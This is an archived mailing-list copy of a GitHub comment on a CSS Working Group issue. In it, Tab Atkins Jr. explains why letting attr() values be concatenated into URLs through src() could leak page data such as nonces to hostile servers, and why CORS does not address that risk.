- From: Tab Atkins Jr. via GitHub <noreply@w3.org>
- Date: Mon, 16 Jun 2025 21:51:32 +0000
- To: public-css-archive@w3.org
As @Crissov says, `src()` lets you specify concatenation, which is the thing we're concerned about. I don't understand how CORS would help us here. The security threat isn't accessing resources on the page's server against its will, it's extracting data from the page (like nonces or user IDs stored in data attributes, or implicitly in the parameters of other URLs) and sending it to *other* (hostile) servers. The hostile server could set up whatever CORS allowances it needs. I *do* want to figure out a way to specify that host-language-defined "URL attributes" (like `<img src>` or `<a href>`) could be used *directly* as a `<url>` via `attr()`, but not when combined with other stuff. That doesn't allow your example, tho, where the URL is specified in a data attribute. That'll require a more general allowlist feature that we've so far avoided specifying. -- GitHub Notification of comment by tabatkins Please view or discuss this issue at https://github.com/w3c/csswg-drafts/issues/12340#issuecomment-2978270319 using your GitHub account -- Sent via github-notify-ml as configured in https://github.com/w3c/github-notify-ml-config
Received on Monday, 16 June 2025 21:51:33 UTC